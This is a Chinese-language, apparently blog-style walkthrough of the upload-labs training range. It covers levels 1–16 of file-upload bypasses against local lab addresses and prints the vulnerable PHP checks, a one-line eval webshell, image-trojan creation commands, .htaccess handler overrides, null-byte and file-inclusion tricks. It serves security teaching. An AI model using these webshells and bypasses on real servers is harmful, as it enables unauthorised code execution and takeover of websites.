upload-labs文件上传漏洞靶场练习 【未完!】

任意文件上传靶场upload-labs下载地址

文章目录

      • Pass-01- 前端JS校验绕过
      • Pass-02- 文件类型MIME类型绕过
      • Pass-03- 文件名后缀黑名单绕过
      • Pass-04- .htaccess绕过
      • Pass-05- 文件名后缀大写绕过
      • Pass-06- 文件名后缀加空格绕过
      • Pass-07- 文件名后缀加点绕过
      • Pass-08-文件名后缀 ::$DATA绕过
      • Pass-09-文件名后缀拼接绕过
      • Pass-10-文件名后缀双写绕过
      • Pass-11- GET型00截断
      • Pass-12- POST型00截断
      • Pass-13- 文件内容头部绕过
      • Pass-14- getimagesize()检查绕过
      • Pass-15- exif_imagetype()检测绕过
      • Pass-16- 二次渲染绕过
      • 未完。。。。。。。。。。。。。。。。。。。。。。。。。。。

Pass-01- 前端JS校验绕过

尝试上传一句话木马

 @eval($_REQUEST[6868])?>

upload-labs文件上传漏洞靶场练习 【未完!】_第1张图片

代码审计:

function checkFile() {
    var file = document.getElementsByName('upload_file')[0].value;
    if (file == null || file == "") {
        alert("请选择要上传的文件!");
        return false;
    }
    //定义允许上传的文件类型
    var allow_ext = ".jpg|.png|.gif";
    //提取上传文件的类型
    var ext_name = file.substring(file.lastIndexOf("."));
    //判断上传文件类型是否允许上传
    if (allow_ext.indexOf(ext_name + "|") == -1) {
        var errMsg = "该文件不允许上传,请上传" + allow_ext + "类型的文件,当前文件类型为:" + ext_name;
        alert(errMsg);
        return false;
    }
}

做了白名单策略,只允许.jpg|.png|.gif后缀的文件

绕过方式:

前端校验一文不值,删除js校验代码onsubmit="return checkFile()

upload-labs文件上传漏洞靶场练习 【未完!】_第2张图片

Pass-02- 文件类型MIME类型绕过

代码审计:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH . '/' . $_FILES['upload_file']['name']            
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '文件类型不正确,请重新上传!';
        }
    } else {
        $msg = UPLOAD_PATH.'文件夹不存在,请手工创建!';
    }
}

绕过方式:

文件类型绕过

修改Content-Type

upload-labs文件上传漏洞靶场练习 【未完!】_第3张图片

Pass-03- 文件名后缀黑名单绕过

代码审计:

做了黑名单策略

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array('.asp','.aspx','.php','.jsp');
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //收尾去空

        if(!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;            
            if (move_uploaded_file($temp_file,$img_path)) {
                 $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '不允许上传.asp,.aspx,.php,.jsp后缀文件!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

绕过方式:

upload-labs文件上传漏洞靶场练习 【未完!】_第4张图片

Pass-04- .htaccess绕过

代码审计:

做了黑名单策略

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2","php1",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2","pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //收尾去空

        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件不允许上传!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

绕过方式:

上传.htaccess文件,内容如下


Sethandler application/x-httpd-php 

.htaccess会改变uploads这个目录下的文件解析规则, 调用php的解析器去解析一个文件名只需包含“jpg”字符串的任意文件

简单来说, 若一个文件的文件名为1.jpg, 其内容是phpinfo(), 那么apache就会调用php解析器去解析此文件

upload-labs文件上传漏洞靶场练习 【未完!】_第5张图片

再上传2.jpg, 文件内容如下:

 phpinfo();?>

upload-labs文件上传漏洞靶场练习 【未完!】_第6张图片

查看上传路径http://192.168.80.139/upload/2.jpg

upload-labs文件上传漏洞靶场练习 【未完!】_第7张图片

访问到图片里的php代码

upload-labs文件上传漏洞靶场练习 【未完!】_第8张图片

Pass-05- 文件名后缀大写绕过

代码审计:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //首尾去空

        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件类型不允许上传!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

相比上一关来说,把.htacces也进入了黑名单

upload-labs文件上传漏洞靶场练习 【未完!】_第9张图片

还没有做大小写转换

绕过方式:

我们可以把上传的木马文件后缀名改为大写

1.php改成1.PHP

上传文件,查看文件路径

upload-labs文件上传漏洞靶场练习 【未完!】_第10张图片

在地址栏中访问http://192.168.80.139/upload/202308301506064212.PHP

没有报错说明上传成功

这个时候可以使用蚁剑来连接

upload-labs文件上传漏洞靶场练习 【未完!】_第11张图片

进入目录管理

upload-labs文件上传漏洞靶场练习 【未完!】_第12张图片

Pass-06- 文件名后缀加空格绕过

代码审计:

代码中少了 trim($file_ext):该函数是将字符串首位的空格去除

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = $_FILES['upload_file']['name'];
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
            if (move_uploaded_file($temp_file,$img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件不允许上传';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

绕过方式:

upload-labs文件上传漏洞靶场练习 【未完!】_第13张图片

Pass-07- 文件名后缀加点绕过

代码审计:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //首尾去空
        
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.$file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件类型不允许上传!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

少了deldot函数

$file_name = deldot($file_name);//删除文件名末尾的点

绕过方式:

在文件后缀后面加个.

upload-labs文件上传漏洞靶场练习 【未完!】_第14张图片

Pass-08-文件名后缀 ::$DATA绕过

代码审计:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = trim($file_ext); //首尾去空
        
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件类型不允许上传!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA

在window的时候如果文件名+"::$DATA"会把::$DATA之后的数据当成文件流处理,不会检测后缀名,且保持::$DATA之前的文件名,他的目的就是不检查后缀名

漏洞绕过:

在上传文件名后面加上 ::$DATA,这样就不会 检测我们上传的文件后缀是什么了

upload-labs文件上传漏洞靶场练习 【未完!】_第15张图片

Pass-09-文件名后缀拼接绕过

代码审计:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //首尾去空
        
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.$file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件类型不允许上传!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

代码先是去除文件名前后的空格,再去除文件名末尾的.,再通过strrchar函数来寻找.来确认文件名的后缀,但是最后保存文件的时候没有重命名而使用的原始的文件名,导致可以利用1.php. .(点+空格+点)来绕过

绕过方式:

上传1.php文件,bp抓包修改文件名后缀1.php. .

使用. .绕过,首先删除一个点,再首尾去空,该文件还是会以.结尾

upload-labs文件上传漏洞靶场练习 【未完!】_第16张图片

Pass-10-文件名后缀双写绕过

代码审计:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = str_ireplace($deny_ext,"", $file_name);
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = UPLOAD_PATH.'/'.$file_name;        
        if (move_uploaded_file($temp_file, $img_path)) {
            $is_upload = true;
        } else {
            $msg = '上传出错!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

将文件名进行过滤操作后,将文件名拼接在路径后面,所以需要绕 过前面的首尾去空以及去点

绕过方式:

修改上传的文件后缀为:1.pphphp

upload-labs文件上传漏洞靶场练习 【未完!】_第17张图片

Pass-11- GET型00截断

00截断原理:

​ 0x00是十六进制表示方法,是ascii码为0的字符,在有些函数处理时,会把这个字符当做结束符。

​ 系统在对文件名的读取时,如果遇到0x00,就会认为读取已结束。

​ 可以通过00截断,绕过对应的白名单验证

​ 1.php0x00.jpg

代码审计:

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
    if(in_array($file_ext,$ext_arr)){
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;

        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = '上传出错!';
        }
    } else{
        $msg = "只允许上传.jpg|.png|.gif类型文件!";
    }
}

白名单过滤,只允许('jpg','png','gif')后缀的文件

upload-labs文件上传漏洞靶场练习 【未完!】_第18张图片

GET型提交的内容会被 自动进行URL解码

绕过方式:

上传2.jpg里面内容是

upload-labs文件上传漏洞靶场练习 【未完!】_第19张图片

upload-labs文件上传漏洞靶场练习 【未完!】_第20张图片

图片上传成功,右键复制图像 链接

upload-labs文件上传漏洞靶场练习 【未完!】_第21张图片

发现地址中有乱码

upload-labs文件上传漏洞靶场练习 【未完!】_第22张图片

去掉2.php后面 的参数,访问到php探针

upload-labs文件上传漏洞靶场练习 【未完!】_第23张图片

Pass-12- POST型00截断

代码审计:

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
    if(in_array($file_ext,$ext_arr)){
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = $_POST['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;

        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = "上传失败";
        }
    } else {
        $msg = "只允许上传.jpg|.png|.gif类型文件!";
    }
}

同样的白名单策略,与上一关不同的是,这次换成了$_POST

upload-labs文件上传漏洞靶场练习 【未完!】_第24张图片

在POST请求中,%00不会被自动解码,需要在16进制中修改为00

绕过方式:

upload-labs文件上传漏洞靶场练习 【未完!】_第25张图片

upload-labs文件上传漏洞靶场练习 【未完!】_第26张图片

upload-labs文件上传漏洞靶场练习 【未完!】_第27张图片

修改完成后点击Forward放包,上传成功!

复制图像链接

upload-labs文件上传漏洞靶场练习 【未完!】_第28张图片

http://127.0.0.1/upload/2.php%EF%BF%BD/7520230830195703.jpg

去掉后面多余的参数

http://127.0.0.1/upload/2.php

upload-labs文件上传漏洞靶场练习 【未完!】_第29张图片

Pass-13- 文件内容头部绕过

代码审计:

upload-labs文件上传漏洞靶场练习 【未完!】_第30张图片

绕过方式:

shell.php内容

 @eval($_REQUEST[6868])?>

upload-labs文件上传漏洞靶场练习 【未完!】_第31张图片

图片木马制作:

windows:
	copy 1.jpg /b + 1.php /a 2.jpg
Linux:
	cat 1.jpg shell.php > shell.jpg

upload-labs文件上传漏洞靶场练习 【未完!】_第32张图片

图片上传成功

upload-labs文件上传漏洞靶场练习 【未完!】_第33张图片

查看上传路径

upload-labs文件上传漏洞靶场练习 【未完!】_第34张图片

图片的上传路径/upload/6720230830201732.jpg

upload-labs文件上传漏洞靶场练习 【未完!】_第35张图片

结合文件包含漏洞执行图片木马

http://127.0.0.1/include.php?file=./upload/6720230830201732.jpg

蚁剑连接

upload-labs文件上传漏洞靶场练习 【未完!】_第36张图片

Pass-14- getimagesize()检查绕过

代码审计:

upload-labs文件上传漏洞靶场练习 【未完!】_第37张图片

getimagesize()函数对文件内容头部做检查

绕过方式:

1、图片木马

2、上传php木马,修改文件内容

upload-labs文件上传漏洞靶场练习 【未完!】_第38张图片

图片上传路径upload/1820230830203805.gif

要想触发木马,需要结合文件包含 来实现

http://127.0.0.1/include.php?file=./upload/1820230830203805.gif

upload-labs文件上传漏洞靶场练习 【未完!】_第39张图片

蚁剑连接

upload-labs文件上传漏洞靶场练习 【未完!】_第40张图片

Pass-15- exif_imagetype()检测绕过

代码审计:

upload-labs文件上传漏洞靶场练习 【未完!】_第41张图片

exif_imagetype — 判断一个图像的类型是否为图片文件

绕过方式:

生成图片木马绕过函数检测,利用文件包含漏洞连接webshell

Pass-16- 二次渲染绕过

该php代码中允许上传图片,但会对图片进行二次渲染,因此我们需要绕过二次渲染的部分,也就是在在二次渲染不会改变的部分加入我们需要的php木马的代码

满足move_uploaded_file就可以上传成功!!!

绕过方式:
地址详解

未完。。。。。。。。。。。。。。。。。。。。。。。。。。。

你可能感兴趣的:(#,渗透测试,网络安全,靶场)